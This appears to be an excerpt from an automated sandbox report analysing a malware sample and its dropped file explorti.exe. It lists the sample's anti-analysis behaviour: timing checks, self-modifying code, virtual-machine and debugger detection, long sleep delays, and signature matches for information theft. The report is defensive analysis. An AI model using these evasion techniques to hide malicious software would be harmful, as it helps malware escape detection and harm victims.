Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53D07F5 second address: 53D0812 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53D0812 second address: 53D083F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F1CC8B8C9E9h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1CC8B8C9EDh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53D083F second address: 53D0885 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1CC8BB7C47h 0x00000009 xor si, 9F8Eh 0x0000000e jmp 00007F1CC8BB7C49h 0x00000013 popfd 0x00000014 push esi 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53D0885 second address: 53D0889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53D0889 second address: 53D089F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53D089F second address: 53D08B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8B8C9EEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53D08B1 second address: 53D08D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1CC8BB7C3Bh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53D08D5 second address: 53D08DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53D08DB second address: 53D08EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C3Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53D08EA second address: 53D0901 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1CC8B8C9EBh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53D0901 second address: 53D093C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F1CC8BB7C41h 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov dx, 331Eh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53D093C second address: 53D0989 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F1CC8B8C9E9h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov edx, 76EBDAA6h 0x00000016 pushfd 0x00000017 jmp 00007F1CC8B8C9F7h 0x0000001c jmp 00007F1CC8B8C9F3h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53D0989 second address: 53D098F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: 53D098F second address: 53D09CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov edx, 79D3019Ah 0x00000012 mov di, 9D66h 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jmp 00007F1CC8B8C9ECh 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F1CC8B8C9EEh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Special instruction interceptor: First address: A6EB77 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Special instruction interceptor: First address: A6C0AE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Special instruction interceptor: First address: C1F84B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Special instruction interceptor: First address: C9FB86 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 44EB77 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 44C0AE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 5FF84B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 67FB86 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Code function: 0_2_054302D7 rdtsc 0_2_054302D7
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1366 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1012 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 484 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 958 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 948 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1315 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3524 Thread sleep count: 31 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3524 Thread sleep time: -62031s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 4348 Thread sleep count: 1366 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 4348 Thread sleep time: -2733366s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6020 Thread sleep count: 1012 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6020 Thread sleep time: -2025012s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2260 Thread sleep count: 484 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2260 Thread sleep time: -14520000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7096 Thread sleep time: -540000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 280 Thread sleep count: 958 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 280 Thread sleep time: -1916958s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1360 Thread sleep count: 948 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1360 Thread sleep time: -1896948s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 4960 Thread sleep count: 1315 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 4960 Thread sleep time: -2631315s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Source: explorti.exe, explorti.exe, 00000006.00000002.2350660627.00000000005D1000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorti.exe, 00000001.00000002.4150196753.0000000001046000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWN
Source: explorti.exe, 00000001.00000002.4150196753.0000000001046000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Jl5yg1Km2s.exe, 00000000.00000002.1762379718.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000006.00000002.2350660627.00000000005D1000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: explorti.exe, 00000001.00000002.4150196753.0000000001003000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SIWVID
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Code function: 0_2_054302D7 rdtsc 0_2_054302D7
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 1_2_0041643B mov eax, dword ptr fs:[00000030h] 1_2_0041643B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 1_2_0041A1A2 mov eax, dword ptr fs:[00000030h] 1_2_0041A1A2
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: explorti.exe, explorti.exe, 00000006.00000002.2350660627.00000000005D1000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: OProgram Manager
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 1_2_003FD2E8 cpuid 1_2_003FD2E8
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 1_2_003FCAED GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 1_2_003FCAED

Stealing of Sensitive Information

barindex
Source: Yara match File source: 1.2.explorti.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.explorti.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Jl5yg1Km2s.exe.a00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000003.1777304943.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2310206865.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1721841303.0000000005210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2350558815.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1762264441.0000000000A01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs